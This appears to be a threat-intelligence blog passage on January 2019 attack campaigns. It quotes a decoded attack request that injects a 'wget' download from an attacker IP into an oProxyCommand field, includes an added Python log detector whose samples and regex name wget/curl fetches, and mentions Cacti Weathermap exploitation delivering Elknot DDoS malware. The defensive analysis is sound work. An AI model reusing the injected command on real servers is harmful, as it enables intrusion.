Vulnerabilities, Exploits, and Malware Driving Attack Campaigns in January 2019
- by nlqip
After the vulnerable server decodes the string, it is instructed to download a malicious file. The malicious request after decoding is:
oProxyCommand= wget http://185.29.8.28/down.php&port=143&user=sdf&passwd=sadf&server_type=imap&f_submit=Submit.
Again, in this case the threat actor took down the malicious file download.php before the researchers could retrieve it for analysis.
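The report only shows the request after decoding. A defender reviewing web server logs needs to apply the same decoding before matching, otherwise the `wget http://...` string never appears in the raw line. The following is an added example (not code from the report or its authors) that URL-decodes and, on the assumption that the attacker wrapped the whole request in base64 (the report does not name the encoding), base64-decodes each query parameter and flags any value that carries a remote-fetch command. The log lines are constructed here for the example; only the decoded request and the 185.29.8.28 host come from the report.

```python
"""Flag web request lines whose (decoded) query parameters carry a remote fetch command.

Added example: decodes URL-encoding and base64 (assumed encoding) on each parameter
value before matching, so a wrapped 'wget http://...' is still detected.
"""
import base64
import binascii
import re
from typing import Iterator, List, Optional, Tuple
from urllib.parse import parse_qsl, quote, unquote_plus, urlsplit

# A parameter value used to pull a remote file: wget/curl followed, on the same
# shell command, by an http(s) URL.  Non-greedy so flags between them are allowed.
FETCH_RE = re.compile(r"\b(wget|curl)\b[^;|&\n]*?https?://", re.IGNORECASE)

# Decoded request quoted in the report (values after '&' are separate fields of
# that request, but an attacker may encode the whole string as one value).
DECODED = ("oProxyCommand= wget http://185.29.8.28/down.php&port=143&user=sdf"
           "&passwd=sadf&server_type=imap&f_submit=Submit")

# Constructed sample log request lines (not from the report).
SAMPLE_ENCODED = (
    "GET /index.php?data="
    + quote(base64.b64encode(DECODED.encode()).decode(), safe="")
    + " HTTP/1.1"
)
SAMPLE_URLENCODED = "GET /mail.php?cmd=wget%20http%3A%2F%2F185.29.8.28%2Fdown.php HTTP/1.1"
SAMPLE_BENIGN = "GET /index.php?page=home&user=sdf HTTP/1.1"


def try_base64(value: str) -> Optional[str]:
    """Return value base64-decoded as UTF-8 text, or None if it is not base64 text."""
    stripped = value.strip()
    # Short values and anything outside the (standard or URL-safe) alphabet are skipped.
    if len(stripped) < 8 or not re.fullmatch(r"[A-Za-z0-9+/=_-]+", stripped):
        return None
    padded = stripped + "=" * (-len(stripped) % 4)   # restore stripped '=' padding
    try:
        raw = base64.b64decode(padded, altchars=b"-_")
        return raw.decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def decoded_views(value: str) -> Iterator[str]:
    """Yield the value as-is, base64-decoded, and URL-decoded again (double encoding)."""
    seen = set()
    for candidate in (value, unquote_plus(value)):
        if candidate not in seen:
            seen.add(candidate)
            yield candidate
        b64 = try_base64(candidate)
        if b64 is not None and b64 not in seen:
            seen.add(b64)
            yield b64


def find_fetch_commands(request_line: str) -> List[Tuple[str, str]]:
    """Return (parameter name, decoded value) pairs that contain a remote fetch command.

    request_line is 'METHOD /path?query HTTP/x' or just the '/path?query' part.
    parse_qsl already URL-decodes once; decoded_views handles the other layers.
    """
    parts = request_line.split()
    path = parts[1] if len(parts) >= 2 else request_line
    hits = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        for view in decoded_views(value):
            if FETCH_RE.search(view):
                hits.append((name, view))
                break   # one report per parameter is enough
    return hits


if __name__ == "__main__":
    for line in (SAMPLE_ENCODED, SAMPLE_URLENCODED, SAMPLE_BENIGN):
        for name, view in find_fetch_commands(line):
            print(f"ALERT parameter={name!r} decoded={view!r}")
```

Running the block prints an alert for the base64-wrapped request and for the plainly URL-encoded one, and nothing for the benign line. In a real pipeline the same decoding layers should be applied to POST bodies and headers, since the report's request may have arrived that way rather than in the query string.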
Weathermap Editor (cacti plugin) Arbitrary Code Execution (CVE-2013-3739)
Another known threat actor was detected trying to exploit the PHP Weathermap Editor Cacti plugin. This vulnerability was first disclosed in April 2013. The threat actor attacks the vulnerability in PHP Weathermap and tries to download and execute a variant of Elknot/BillGates malware. Elknot is an infamous DDoS botnet family that runs on Linux and Windows systems. This malware, first detected in 2014, is used to launch DDoS attacks and seems to be spreading again. The attack vectors available within the malware include: ICMP flood, TCP flood, UDP flood, SYN flood, HTTP flood (Layer7), and DNS reflection floods. As we can see in Figure 8, 33 engines on VirusTotal.com detected this file as malicious.